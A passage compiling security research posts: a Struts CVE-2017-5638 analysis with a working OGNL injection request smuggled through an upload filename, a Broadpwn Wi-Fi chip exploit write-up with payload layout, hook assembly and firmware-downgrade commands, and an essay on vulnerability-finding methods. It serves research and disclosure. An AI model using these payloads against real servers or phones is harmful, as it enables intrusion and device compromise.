presented here. Why does it perform extra steps such as checking a _memberAccess variable and calling a method named setMemberAccess? It may be an attempt to leverage another technique to clear each blacklist, just in case the first technique didn’t work. The setMemberAccess method is called with a default instance of the MemberAcess class, which in effect clears each blacklist too. I could confirm that this technique works in Struts 2.3.31 but not 2.5.10. I am still unsure, however, of what the purpose is of the ternary operator that checks for and conditionally assigns _memberAccess. During testing I did not observe this variable to evaluate as true. Other Exploit Vectors Other exploit vectors exist for this vulnerability as of 2.5.10. This is due to the fact that any exception message tainted with user input that doesn’t have an associated error key will be evaluated as OGNL. For example, supplying an upload filename with a null byte will cause an InvalidFileNameException exception to be thrown from the Apache commons fileupload library. This would also bypass a web application firewall rule examining the content-type header. The %00 in the request below should be URL decoded first. The result is an exception message that is tainted with user input. 
Reproduction Request: POST /struts2-showcase/ HTTP/1.1 Host: localhost:8080 Content-Type: multipart/form-data; boundary=---------------------------1313189278108275512788994811 Content-Length: 570 -----------------------------1313189278108275512788994811 Content-Disposition: form-data; name="upload"; filename="a%00${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))}” Content-Type: text/html test -----------------------------1313189278108275512788994811-- Reproduction Response: HTTP/1.1 404 No result defined for action com.opensymphony.xwork2.ActionSupport and result input Set-Cookie: JSESSIONID=hu1m7hcdnixr1h14hn51vyzhy;Path=/struts2-showcase X-Struts-Exploit-Test: GDSTEST Content-Type: text/html;charset=ISO-8859-1 [..snip..] Logged Exception: 2017-03-24 15:21:29,729 WARN [qtp1168849885-26] multipart.JakartaMultiPartRequest (JakartaMultiPartRequest.java:82) - Unable to parse request org.apache.commons.fileupload.InvalidFileNameException: Invalid file name: a\0${(#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Struts-Exploit-Test','GDSTEST'))} at org.apache.commons.fileupload.util.Streams.checkFileName(Streams.java:189) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.commons.fileupload.disk.DiskFileItem.getName(DiskFileItem.java:259) ~[commons-fileupload-1.3.2.jar:1.3.2] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processFileField(JakartaMultiPartRequest.java:105) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.processUpload(JakartaMultiPartRequest.java:96) ~[struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.JakartaMultiPartRequest.parse(JakartaMultiPartRequest.java:67) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.multipart.MultiPartRequestWrapper.(MultiPartRequestWrapper.java:86) [struts2-core-2.5.10.jar:2.5.10] at org.apache.struts2.dispatcher.Dispatcher.wrapRequest(Dispatcher.java:806) [struts2-core-2.5.10.jar:2.5.10] As you can see by looking at the stacktrace, control flow diverges in the processUpload method of the JakartaMultiPartRequest class. Instead of an exception being thrown when calling the parseRequest method on line 91, an exception is thrown when calling the processFileField method and getting the name of a file item on line 105. core/src/main/java/org/apache/struts2/dispatcher/multipart/JakartaMultiPartRequest.java: 90: protected void processUpload(HttpServletRequest request, String saveDir) throws FileUploadException, UnsupportedEncodingException { 91: for (FileItem item : parseRequest(request, saveDir)) { 92: LOG.debug("Found file item: [{}]", item.getFieldName()); 93: if (item.isFormField()) { 94: processNormalFormField(item, request.getCharacterEncoding()); 95: } else { 96: processFileField(item); 97: } 98: } 99: } [..snip..] 
101:     protected void processFileField(FileItem item) {
102:         LOG.debug("Item is a file upload");
103: 
104:         // Skip file uploads that don't have a file name - meaning that no file was selected.
105:         if (item.getName() == null || item.getName().trim().length() < 1) {
106:             LOG.debug("No file has been uploaded for the field: {}", item.getFieldName());
107:             return;
108:         }
109: 
110:         List<FileItem> values;
111:         if (files.get(item.getFieldName()) != null) {
112:             values = files.get(item.getFieldName());
113:         } else {
114:             values = new ArrayList<>();
115:         }
116: 
117:         values.add(item);
118:         files.put(item.getFieldName(), values);
119:     }

Takeaways

One takeaway I had from this research is that you can't always rely on reading CVE descriptions to understand how a vulnerability works. The reason this vulnerability was ever possible was because the file upload interceptor attempted to resolve error messages using a potentially dangerous function that evaluates OGNL. The elimination of this possibility is what led to a successful patching of this vulnerability. Therefore this is not a problem with the Jakarta request wrapper, as the CVE description implies, but with the file upload interceptor trusting that exception messages will be free of user input.

Another takeaway reinforced the idea that you can't rely on known attack signatures to block exploitation at the web application firewall level. For example, if a web application firewall were configured to look for OGNL in the Content-Type header, it would miss the additional attack vector explained in this post. The only reliable way to eliminate vulnerabilities like this one is to apply available patches, either manually or by installing updates.

Eric Rafaloff
Source: https://blog.gdssecurity.com/labs/2017/3/27/an-analysis-of-cve-2017-5638.html
  6. Crashing phones with Wi-Fi: Exploiting nitayart's Broadpwn bug (CVE-2017-9417) This is part 2 of a two-part series on Broadpwn: part 1 is here: A cursory analysis of @nitayart's Broadpwn bug (CVE-2017-9417) TLDR: If you're near a malicious Wi-Fi network, an attacker can take over your Wi-Fi chip using @nitayart's Broadpwn bug, and then take over the rest of your phone with Project Zero/@laginimaineb's previously disclosed DMA attack. As a proof of concept, I've made a malicious network which uses these two exploits to corrupt the RAM of my Nexus 6P, causing a crash and reboot. Plan There's two parts to this proof of concept: A method to get arbitrary code execution on the Wi-Fi chip using @nitayart's Broadpwn bug An implementation of Project Zero's DMA engine hook to corrupt the kernel in the main system memory over PCIE The first part is very reliable - I can always get code execution; the second part only works sometimes, since we're pointing the Wi-Fi packet DMA into main memory, and so success depends on what packets are DMAed. Code execution on the Wi-Fi chip In the last post, we managed to cause a heap write out of bounds using the Broadpwn bug, which causes the Wi-Fi chip to crash when reading an invalid address. Here's the crashlog from the previous post: [ 695.399412] CONSOLE: FWID 01-a2412ac4 [ 695.399420] CONSOLE: flags 60040005 [ 695.399425] CONSOLE: 000003.645 [ 695.399430] CONSOLE: TRAP 4(23fc30): pc 5550c, lr 2f697, sp 23fc88, cpsr 2000019f, spsr 200001bf [ 695.399435] CONSOLE: 000003.645 dfsr 1, dfar 41414145 [ 695.399441] CONSOLE: 000003.645 r0 41414141, r1 2, r2 1, r3 0, r4 22cc00, r5 217634, r6 217048 [ 695.399449] CONSOLE: 000003.645 r7 2, r8 56, r9 1, r10 216120, r11 217224, r12 8848cb89 [ 695.399455] CONSOLE: 000003.645 [ 695.399460] CONSOLE: sp+0 00000002 0022cc00 0022d974 00217634 [ 695.399465] CONSOLE: 000003.645 sp+10 00000004 0001aa83 0022d97f 00000168 [ 695.399471] CONSOLE: [ 695.399476] CONSOLE: 000003.645 sp+14 0001aa83 [ 695.399481] CONSOLE: 000003.645 sp+38 000937eb [ 695.399486] CONSOLE: 000003.645 sp+44 00003b15 [ 695.399492] CONSOLE: 000003.645 sp+4c 00088659 [ 695.399497] CONSOLE: 000003.645 sp+64 00008fc7 [ 695.399502] CONSOLE: 000003.645 sp+74 0000379b [ 695.399507] CONSOLE: 000003.645 sp+94 00000a29 [ 695.399512] CONSOLE: 000003.645 sp+c4 0019a9e1 [ 695.399517] CONSOLE: 000003.645 sp+e4 00006a4d [ 695.399523] CONSOLE: 000003.645 sp+11c 00188113 [ 695.399528] CONSOLE: 000003.645 sp+15c 000852ef [ 695.399533] CONSOLE: 000003.645 sp+180 00019735 [ 695.399538] CONSOLE: 000003.645 sp+194 0001ec73 [ 695.399543] CONSOLE: 000003.645 sp+1bc 00018ba5 [ 695.399549] CONSOLE: 000003.645 sp+1dc 00018a75 [ 695.399554] CONSOLE: 000003.645 sp+1fc 0000656b First, let's figure out what exactly we're overwriting. According to Project Zero, heap allocations begin with a 8-byte header: a uint32_t containing the allocation's size and a pointer to the next free chunk if the current chunk is free or null if it's allocated. I connected to a normal Wi-Fi network that uses QoS, and dumped the Wi-Fi chip's RAM using dhdutil. Next, I used a modified version of Project Zero's heap visualization script to iterate through the entire heap, looking for allocations that begin with 0050f202 (the start of a WME information element). It turns out there's two allocations that both begin with this series of bytes: the chunk at 0x1f3550 and at 0x21700c. 
Both are followed by another chunk 0x78 bytes in size (at 0x1f3584 and 0x217040). Looking at the stack in the crashlog, we can see that r6=0x217048 matches the start of the second allocation, so the address we're overflowing seems to be the second one.

Next, what are we overwriting afterwards? Right now, we only know the next chunk's size (0x78) and contents (a few pointers, no function pointers). Let's look at the code that crashed. Going up the call stack, we identified a function that contains a printf call with the function name. After cross referencing, we're able to reconstruct this call stack:

0x5550c wlc_hrt_del_timeout
0x635cc wlc_pm2_sleep_ret_timer_stop
0x2f670 wlc_set_pm_mode
0x19734 _wlc_ioctl

So it looks like we overwrote a pointer to a timer, and the firmware crashes when disabling it. This type of timer is placed in a singly linked list when enabled. A timer looks like this:

typedef struct wlc_hrt_to {
    wlc_hrt_to_t *next;   // 0x0
    list_head *hrti;      // 0x4
    uint32_t timeout;     // 0x8
    void *func;           // 0xc
} wlc_hrt_to_t;

So when disabling a timer, wlc_hrt_del_timeout performs the following:
  • Check if the passed-in pointer to the timer is null; if so, return
  • Grab the pointer to the head of the list from the timer
  • Iterate through the list until it finds the timer to disable
  • Once it finds it, add the remaining time on the timer to the next timer in the sequence
  • Perform a standard singly-linked list unlink (prev->next = this->next)
  • Finally, set the function pointer on the timer to null

So how can we turn this into a write primitive? Abuse the timeout addition!
  • Make a fake timer object
  • Set the pointer to the head of the list to a fake linked list head
  • This fake linked list head points to the fake timer object
  • Set the next pointer on this fake timer object to point to the code we want to overwrite
  • Set the remaining time on this fake object to be (target value - current value at the address we want to overwrite)
  • We also overlap the timer's function pointer with the linked list head's next pointer

And so, when the firmware attempts to disable this fake timer, it:
  • Finds our timer object - it's the first timer in the fake linked list
  • Adds the remaining time to the next timer in the list - which is pointing to the code we want to overwrite, giving us a write
  • Does the unlink by setting prev->next (which is the head of the list right now) to this->next
  • And zeros out the function pointer. Since we overlapped the fake timer with the fake linked list head, this also zeroes the list head's ->next pointer, so any future attempts to disable this timer will fail gracefully when it sees an empty linked list, preventing crashes.

I decided to use this to change the first instruction of dma64_txfast to a branch instruction that jumps into our overflowed buffer, allowing arbitrary code execution on the Wi-Fi chip. There's a few other things to take care of:
  • setting the other pointers in the overwritten structure to null to prevent crashes when the firmware tries to access them
  • filling the beginning of the overflowed structure with 0x41 to cause the firmware to disable the fake timer (for some reason, if I set it all to 0x00, the fake timer is never disabled. I don't know why.)
  • making sure the firmware doesn't overwrite our payload (I made a payload with 0x41s, connected to the network, dumped the RAM to see which bytes were overwritten, and put code and structures into the intact areas)
but after that, we have code execution! The payload can be seen here, with comments on the purpose of each part.
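To make the layout concrete, here is a small sketch (not from the original post) of how the 16-byte fake timer could be packed, using the wlc_hrt_to field offsets above. All addresses and values are hypothetical placeholders; the real ones have to be recovered from a RAM dump of the specific chip and firmware build, and exactly where inside the "next timer" the remaining time gets added should be confirmed against the disassembly.

import struct

# Hypothetical addresses - the real ones come from dumping the Wi-Fi chip's RAM
# (e.g. with dhdutil) for the specific firmware being targeted.
FAKE_TIMER_ADDR = 0x217100                 # where the fake wlc_hrt_to lands in the overflowed buffer
FAKE_LIST_HEAD  = FAKE_TIMER_ADDR + 0xc    # the fake list head overlaps the timer's func field

TARGET_ADDR   = 0xBADBEEF0                 # word we want to modify (e.g. first instruction of dma64_txfast)
CURRENT_VALUE = 0x00000000                 # value currently at the target (read from a RAM dump)
WANTED_VALUE  = 0x12345678                 # value we want there after the timeout is added

fake_timer = struct.pack(
    "<IIII",
    TARGET_ADDR,                                   # next: the "timer" whose remaining time gets incremented
    FAKE_LIST_HEAD,                                # hrti: points at our fake linked list head
    (WANTED_VALUE - CURRENT_VALUE) & 0xFFFFFFFF,   # timeout: the delta that gets added at the target
    FAKE_TIMER_ADDR,                               # func: doubles as the list head's ->next (zeroed after the unlink)
)
# fake_timer is then embedded at FAKE_TIMER_ADDR within the data that overflows the heap chunk.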
Now, what to execute?

Crashing the main CPU

Let's implement Project Zero's DMA attack. The TLDR of their approach is that recent phones connect Wi-Fi chipsets via PCI Express, which allows arbitrary memory writes and reads through DMA. By manipulating the list of DMA buffers on the Wi-Fi chip, an attacker can write any information into main memory, thus getting code execution on the main CPU.

I'm using Project Zero's first DMA attack, which simply sets the D2H_MSGRING_TX_COMPLETE ring's ringaddr to point into the kernel. I dumped the address of the ring structure using Project Zero's dump_pci.py script, and then wrote a hook that patches the target address to 0x248488 in the main CPU's physical memory (which seems to correspond to critical code in the kernel I'm running), and also patches out the WME IE bug that we exploited in the first place (so that we don't accidentally run the exploit twice). Here's the hook:

.syntax unified
.thumb
hook_entry:                 // 0x90
    push {r0-r3,r4-r9,lr}   // 0x217090
    bl fullhook             // 0x217094
    pop {r0-r3}             // 0x217098
    .word 0xbaf9f774        // 0x21709a: branch to original txfast
fullhook:
    ldr r3, patchoutaddr    // 0x21709e
    ldr r2, patchaddr       // 0x2170a0
    str r2, [r3]            // 0x2180a2
    ldr r2, ringaddr        // 0x2180a4
    ldr r3, valuewritten    // 0x2180a6
    str r3, [r2]            // 0x2180a8
    bx lr                   // 0x2180aa
valuewritten:
    .word 0x00248488        // 0x2180ac physical address on the host side; seems to crash things...
patchoutaddr:
    .word 0x1b8ad0          // 0x2180b0 function to patch
patchaddr:
    .word 0x47702000        // 0x2180b4 mov r0, #0; bx lr - note firmware overwrites byte 0 with a 0; it's fine
ringaddr:
    .word 0x002397C4        // 0x2180b8 ringaddr of D2H_MSGRING_TX_COMPLETE dumped with Project Zero's dump_pci.py

This is then assembled and placed into the payload. The next time dma64_txfast is called, our code will patch the DMA ring, and the next Wi-Fi packet to be processed will overwrite part of the main CPU's kernel, crashing it. The final payload can be seen here, along with other useful scripts.

Result

Experimental setup: computer same as before (Ubuntu 14.04, hostapd 2.6, Intel 7260 integrated Wi-Fi). Phone same as before: Google/Huawei Nexus 6P, running the latest firmware (N2G48B), but modified with the vulnerable June Broadcom firmware for testing this bug, and with a custom kernel for rooting. Since the bug is in the Wi-Fi firmware only, this should give the same result as an unupdated stock Nexus 6P.

When the device connected to the network, it froze, and then after a few seconds it rebooted. The console-ramoops file (which contains the kernel log from the previous boot) shows a kernel panic from an invalid instruction exception in the kernel. (I tried to overwrite sys_nanosleep, but missed. It seemed to break something at least.) The crash isn't very reliable (the code exec on the Wi-Fi chip seems to be reliable, but getting the PCIE DMA to cooperate isn't.)
When it works, the crash log shows this: [ 5887.413947] CFG80211-ERROR) wl_cfg80211_connect : Connecting to (MAC address) with channel (1) ssid (Network) [ 5887.420050] CFG80211-ERROR) wl_notify_connect_status : connect failed event=0 e->status 4 e->reason 1 [ 5887.426601] CFG80211-ERROR) wl_bss_connect_done : Report connect result - connection failed [ 5887.474993] WLDEV-ERROR) wldev_set_country : wldev_set_country: set country for CA as US rev 975 [ 5887.596971] type=1400 audit(1499840123.620:282): avc: denied { syslog_read } for pid=14628 comm="WifiStateMachin" scontext=u:r:system_server:s0 tcontext=u: r:kernel:s0 tclass=system permissive=1 [ 5887.642896] dhd_dbg_monitor_get_tx_pkts(): no tx_status in tx completion messages, make sure that 'd11status' is enabled in firmware, status_pos=0 [ 5887.810772] HTB: quantum of class 10001 is big. Consider r2q change. [ 5887.829826] HTB: quantum of class 10010 is big. Consider r2q change. [ 5889.614299] Internal error: Oops - undefined instruction: 0 [#1] PREEMPT SMP [ 5889.614322] CPU: 0 PID: 23518 Comm: kworker/0:1 Tainted: G W 3.10.73-g4f6d61a-00391-gde1f200-dirty #38 [ 5889.614339] Workqueue: events rslow_comp_work [ 5889.614350] task: ffffffc0812d8ac0 ti: ffffffc08d134000 task.ti: ffffffc08d134000 [ 5889.614358] PC is at fg_mem_write+0x3f0/0x4dc [ 5889.614364] LR is at fg_mem_write+0x3f0/0x4dc [ 5889.614370] pc : [<ffffffc0008b8480>] lr : [<ffffffc0008b8480>] pstate: 60000145 [ 5889.614374] sp : ffffffc08d137b80 [ 5889.614379] x29: ffffffc08d137b80 x28: ffffffc0bec2f2c8 [ 5889.614388] x27: ffffffc08d137bfe x26: ffffffc08d137c0f [ 5889.614396] x25: ffffffc08d137c10 x24: 0000000000000000 [ 5889.614405] x23: ffffffc08d137cc4 x22: 0000000000000000 [ 5889.614413] x21: 0000000000000004 x20: 0000000000000001 [ 5889.614421] x19: ffffffc0bec2f018 x18: 0000000000000000 [ 5889.614429] x17: 0000000000000000 x16: ffffffc00034f1bc [ 5889.614438] x15: 0000000000000000 x14: 0ffffffffffffffe [ 5889.614446] x13: 0000000000000030 x12: 0101010101010101 [ 5889.614454] x11: 7f7f7f7f7f7f7f7f x10: 0000000000004410 [ 5889.614462] x9 : ffffffc006158018 x8 : ffffffc00168e300 [ 5889.614471] x7 : 0000000000000818 x6 : 0000000000000000 [ 5889.614479] x5 : 0000000000000818 x4 : 00000000fc4cf000 [ 5889.614487] x3 : 0000000000000001 x2 : 09104ccfa95a13c2 [ 5889.614495] x1 : 09104ccfa95a13c2 x0 : 0000000000000000 (snip a few lines) [ 5889.615088] Process kworker/0:1 (pid: 23518, stack limit = 0xffffffc08d134058) [ 5889.615093] Call trace: [ 5889.615100] [<ffffffc0008b8480>] fg_mem_write+0x3f0/0x4dc [ 5889.615106] [<ffffffc0008b8a38>] fg_mem_masked_write+0x114/0x178 [ 5889.615113] [<ffffffc0008ba598>] rslow_comp_work+0x238/0x364 [ 5889.615123] [<ffffffc00023d224>] process_one_work+0x25c/0x3c0 [ 5889.615129] [<ffffffc00023d580>] worker_thread+0x1f8/0x348 [ 5889.615139] [<ffffffc000243e70>] kthread+0xc0/0xcc [ 5889.615147] Code: f9400660 52800023 11004042 97fff7bc (000103e2) [ 5889.615153] ---[ end trace 48638eec16f50d72 ]--- [ 5889.628687] Kernel panic - not syncing: Fatal exception [ 5889.628851] CPU1: stopping Impact Yep, we've proved Broadpwn to be exploitable. In addition, the heap buffers that are overflowed are allocated at startup, so they are stable for a given firmware version and chip. So if attackers knows your device and your firmware version, they can take over the Wi-Fi chip and then the whole phone. I think @Viss has the best advice: just turn Wi-Fi off. Stuff I don't know how to do There's a few issues that prevents this proof-of-concept from being useful. 
  • Project Zero's proof of concept, implemented here, DMAs random network packets into main memory; I was unable to implement their more advanced dma64_txfast hook (which gives more control over the address to write - it worked once, and only once, and I can't reproduce it). Can we control what's written so that we can modify the kernel instead of just corrupting and crashing it?
  • Currently, the Wi-Fi stops working if I trigger the bug, even if I use a payload that doesn't crash the device or the Wi-Fi chip. It just fails to finish connecting to the network. An attacker will need to keep the Wi-Fi working to avoid user suspicion and to exfiltrate data.
  • The current payload requires the address of the buffer that's overflowed plus the address of dma64_txfast, both of which differ between phones and firmware versions. Is it possible to develop an exploit that works on all devices?

@nitayart's Black Hat presentation is likely to cover some of these, so don't miss it.

Appendix: testing with a different version of firmware
I have my phone updated to the latest version of Android, so when I need to test this bug, I need to downgrade the Broadcom firmware. Here's how:

$ adb shell
# setenforce 0
# cp fw_bcmdhd.bin /data/local/tmp/firmware/
# chmod 755 /data/local/tmp/firmware/fw_bcmdhd.bin
# mount -o bind /data/local/tmp/firmware /vendor/firmware
# stop
# start

Source: http://boosterok.com/blog/broadpwn2/
  7. High-Level Approaches for Finding Vulnerabilities Fri 15 September 2017 This post is about the approaches I've learned for finding vulnerabilities in applications (i.e. software security bugs, not misconfigurations or patch management issues). I'm writing this because it's something I wish I had when I started. Although this is intended for beginners and isn't new knowledge, I think more experienced analysts might gain from comparing this approach to their own just like I have gained from others like Brian Chess and Jacob West, Gynvael Coldwind, Malware Unicorn, LiveOverflow, and many more. Keep in mind that this is a work-in-progress. It's not supposed to be comprehensive or authoritative, and it's limited by the knowledge and experience I have in this area. I've split it up into a few sections. I'll first go over what I think the discovery process is at a high level, and then discuss what I would need to know and perform when looking for security bugs. Finally, I'll discuss some other thoughts and non-technical lessons learned that don't fit as neatly in the earlier sections. What is the vulnerability discovery process? In some ways, the vulnerability discovery process can be likened to solving puzzles like mazes, jigsaws, or logic grids. One way to think about it abstractly is to see the process as a special kind of maze where: You don't immediately have a birds-eye view of what it looks like. A map of it is gradually formed over time through exploration. You have multiple starting points and end points but aren't sure exactly where they are at first. The final map will almost never be 100% clear, but sufficient to figure out how to get from point A to B. If we think about it less abstractly, the process boils down to three steps: Enumerate entry points (i.e. ways of interacting with the app). Think about insecure states (i.e. vulnerabilities) that an adversary would like to manifest. Manipulate the app using the identified entry points to reach the insecure states. In the context of this process, the maze is the application you're researching, the map is your mental understanding of it, the starting points are your entry points, and the end points are your insecure states. Entry points can range from visibly modifiable parameters in the UI to interactions that are more obscure or transparent to the end-user (e.g. IPC). Some of the types of entry points that are more interesting to an adversary or security researcher are: Areas of code that are older and haven't changed much over time (e.g. vestiges of transition from legacy). Intersections of development efforts by segmented teams or individuals (e.g. interoperability). Debugging or test code that is carried forward into production from the development branch. Gaps between APIs invoked by the client vs. those exposed by the server. Internal requests that are not intended to be influenced directly by end-users (e.g. IPC vs form fields). The types of vulnerabilities I think about surfacing can be split into two categories: generic and contextual. Generic vulnerabilities (e.g. RCE, SQLi, XSS, etc.) can be sought across many applications often without knowing much of their business logic, whereas contextual vulnerabilities (e.g. unauthorized asset exposure/tampering) require more knowledge of business logic, trust levels, and trust boundaries. The rule of thumb I use when prioritizing what to look for is to first focus on what would yield the most impact (i.e. 
highest reward to an adversary and the most damage to the application's stakeholders). Lightweight threat models like STRIDE can also be helpful in figuring out what can go wrong. Let's take a look at an example web application and then an example desktop application. Let's say this web application is a single-page application (SPA) for a financial portal and we have authenticated access to it, but no server-side source code or binaries. When we are enumerating entry points, we can explore the different features of the site to understand their purpose, see what requests are made in our HTTP proxy, and bring some clarity to our mental map. We can also look at the client-side JavaScript to get a list of the RESTful APIs called by the SPA. A limitation of not having server-side code is that we can't see the gaps between the APIs called by the SPA and those that are exposed by the server. The identified entry points can then be manipulated in an attempt to reach the insecure states we're looking for. When we're thinking of what vulnerabilities to surface, we should be building a list of test-cases that are appropriate to the application's technology stack and business logic. If not, we waste time trying test cases that will never work (e.g. trying xp_cmdshell when the back-end uses Postgres) at the expense of not trying test cases that require a deeper understanding of the app (e.g. finding validation gaps in currency parameters of Forex requests). With desktop applications, the same fundamental process of surfacing vulnerabilities through identified entry points still apply but there are a few differences. Arguably the biggest difference with web applications is that it requires a different set of subject-matter knowledge and methodology for execution. The OWASP Top 10 won't help as much and hooking up the app to an HTTP proxy to inspect network traffic may not yield the same level of productivity. This is because the entry points are more diverse with the inclusion of local vectors. Compared to black-box testing, there is less guesswork involved when you have access to source code. There is less guesswork in finding entry points and less guesswork in figuring out vulnerable code paths and exploitation payloads. Instead of sending payloads through an entry point that may or may not lead to a hypothesized insecure state, you can start from a vulnerable sink and work backwards until an entry point is reached. In a white-box scenario, you become constrained more by the limitations of what you know over the limitations of what you have. What knowledge is required? So why are we successful? We put the time in to know that network. We put the time in to know it better than the people who designed it and the people who are securing it. And that's the bottom line. — Rob Joyce, TAO Chief The knowledge required for vulnerability research is extensive, changes over time, and can vary depending on the type of application. The domains of knowledge, however, tend to remain the same and can be divided into four: Application Technologies. This embodies the technologies a developer should know to build the target application, including programming languages, system internals, design paradigms/patterns, protocols, frameworks/libraries, and so on. A researcher who has experience programming with the technologies appropriate to their target will usually be more productive and innovative than someone who has a shallow understanding of just the security concerns associated with them. 
Offensive and Defensive Concepts. These range from foundational security principles to constantly evolving vulnerability classes and mitigations. The combination of offensive and defensive concepts guide researchers toward surfacing vulnerabilities while being able to circumvent exploit mitigations. A solid understanding of application technologies and defensive concepts is what leads to remediation recommendations that are non-generic and actionable. Tools and Methodologies. This is about effectively and efficiently putting concepts into practice. It comes through experience from spending time learning how to use tools and configuring them, optimizing repetitive tasks, and establishing your own workflow. Learning how relevant tools work, how to develop them, and re-purpose them for different use cases is just as important as knowing how to use them. A process-oriented methodology is more valuable than a tool-oriented methodology. A researcher shouldn't stop pursuing a lead when a limitation of a tool they're using has been reached. The bulk of my methodology development has come from reading books and write-ups, hands-on practice, and learning from many mistakes. Courses are usually a good way to get an introduction to topics from experts who know the subject-matter well, but usually aren't a replacement for the experience gained from hands-on efforts. Target Application. Lastly, it's important to be able to understand the security-oriented aspects of an application better than its developers and maintainers. This is about more than looking at what security-oriented features the application has. This involves getting context about its use cases, enumerating all entry points, and being able to hypothesize vulnerabilities that are appropriate to its business logic and technology stack. The next section details the activities I perform to build knowledge in this area. The table below illustrates an example of what the required knowledge may look like for researching vulnerabilities in web applications and Windows desktop applications. Keep in mind that the entries in each category are just for illustration purposes and aren't intended to be exhaustive. Web Applications Desktop Applications Application Technologies Offensive and Defensive Concepts Tools and Methodologies Target Application Thousands of hours, hundreds of mistakes, and countless sleepless nights go into building these domains of knowledge. It's the active combination and growth of these domains that helps increase the likelihood of finding vulnerabilities. If this section is characterized by what should be known, then the next section is characterized by what should be done. What activities are performed? When analyzing an application, I use the four "modes of analysis" below and constantly switch from one mode to another whenever I hit a mental block. It's not quite a linear or cyclical process. I'm not sure if this model is exhaustive, but it does help me stay on track with coverage. Within each mode are active and passive activities. Active activities require some level of interaction with the application or its environment whereas passive activities do not. That said, the delineation is not always clear. The objective for each activity is to: Understand assumptions made about security. Hypothesize how to undermine them. Attempt to undermine them. Use case analysis is about understanding what the application does and what purpose it serves. It's usually the first thing I do when tasked with a new application. 
Interacting with a working version of the application along with reading some high-level documentation helps solidify my understanding of its features and expected boundaries. This helps me come up with test cases faster. If I have the opportunity to request internal documentation (threat models, developer documentation, etc.), I always try to do so in order to get a more thorough understanding. This might not be as fun as doing a deep-dive and trying test cases, but it's saved me a lot of time overall. An example I can talk about is with Oracle Opera where, by reading the user manual, I was able to quickly find out which database tables stored valuable encrypted data (versus going through them one by one). Implementation analysis is about understanding the environment within which the application resides. This may involve reviewing network and host configurations at a passive level, and performing port or vulnerability scans at an active level. An example of this could be a system service that is installed where the executable has an ACL that allows low-privileged users to modify it (thereby leading to local privilege escalation). Another example could be a web application that has an exposed anonymous FTP server on the same host, which could lead to exposure of source code and other sensitive files. These issues are not inherent to the applications themselves, but to how they have been implemented in their environments. Communications analysis is about understanding what and how the target exchanges information with other processes and systems. Vulnerabilities can be found by monitoring or actively sending crafted requests through different entry points and checking if the responses yield insecure states. Many web application vulnerabilities are found this way. Network and data flow diagrams, if available, are very helpful in seeing the bigger picture. While an understanding of application-specific communication protocols is required for this mode, an understanding of the application's internal workings is not. How user-influenced data is passed and transformed within a system is more or less treated as a black box in this analysis mode, with the focus on monitoring and sending requests and analyzing the responses that come out. If we go back to our hypothetical financial portal from earlier, we may want to look at the feature that allows clients to purchase prepaid credit cards in different currencies as a contrived example. Let's assume that a purchase request accepts the following parameters:
fromAccount: The account from which money is being withdrawn to purchase the prepaid card.
fromAmount: The amount of money to place into the card in the currency of fromAccount (e.g. 100).
cardType: The type of card to purchase (e.g. USD, GBP).
currencyPair: The currency pair for fromAccount and cardType (e.g. CADUSD, CADGBP).
The first thing we might want to do is send a standard request so that we know what a normal response should look like as a baseline. A request and response to purchase an $82 USD card from a CAD account might look like this:
Request: { "fromAccount": "000123456", "fromAmount": 100, "cardType": "USD", "currencyPair": "CADUSD" }
Response: { "status": "ok", "cardPan": 4444333322221111, "cardType": "USD", "toAmount": 82.20 }
We may not know exactly what happened behind the scenes, but it came out ok as indicated by the status attribute.
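As an illustration, replaying that baseline purchase outside the browser might look like the sketch below. The host, path, and session handling here are hypothetical; in practice you would lift them straight from the requests captured in your HTTP proxy:
# Baseline request: buy a USD prepaid card funded from a CAD account (endpoint and cookie are made up for illustration)
curl -s -X POST 'https://portal.example.com/api/v1/cards/purchase' \
  -H 'Content-Type: application/json' \
  -H 'Cookie: session=<your session token>' \
  -d '{"fromAccount":"000123456","fromAmount":100,"cardType":"USD","currencyPair":"CADUSD"}'
Having the baseline scripted makes it easy to diff responses as you start mutating one parameter at a time.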
Now if we tweak the fromAmount to something negative, or the fromAccount to someone else's account, those may return erroneous responses indicating that validation is being performed. If we change the value of currencyPair from CADUSD to CADJPY, we'll see that the toAmount changes from 82.20 to 8863.68 while the cardType is still USD. We're able to get more bang for our buck by using a more favourable exchange rate while the desired card type stays the same. If we have access to back-end code, it would make it easier to know what's happening to that user input and come up with more thorough test cases that could lead to insecure states with greater precision. Perhaps an additional request parameter that's not exposed on the client-side could have altered the expected behaviour in a potentially malicious way. Code and binary analysis is about understanding how user-influenced input is passed and transformed within a target application. To borrow an analogy from Practical Malware Analysis, if the last three analysis modes can be compared to looking at the outside of a body during an autopsy, then this mode is where the dissection begins. There are a variety of activities that can be performed for static and dynamic analysis. Here are a few: Data flow analysis. This is useful for scouting entry points and understanding how data can flow toward potential insecure states. When I'm stuck trying to get a payload to work in the context of communications analysis, I tweak it in different ways to try get toward that hypothesized insecure state. In comparison with this mode, I can first look into checking whether that insecure state actually exists, and if so, figure out how to craft my payload to get there with greater precision. As mentioned earlier, one of the benefits of this mode is being able to find insecure states and being able to work backwards to craft payloads for corresponding entry points. Static and dynamic analysis go hand-in-hand here. If you're looking to go from point A to B, then static analysis is like reading a map, and dynamic analysis is like getting a live overview of traffic and weather conditions. The wide and abstract understanding of an application you get from static analysis is complemented by the more narrow and concrete understanding you get from dynamic analysis. Imports analysis. Analyzing imported APIs can give insight into how the application functions and how it interacts with the OS, especially in the absence of greater context. For example, the use of cryptographic functions can indicate that some asset is being protected. You can trace calls to figure out what it's protecting and whether it's protected properly. If a process is being created, you can look into determining whether user-input can influence 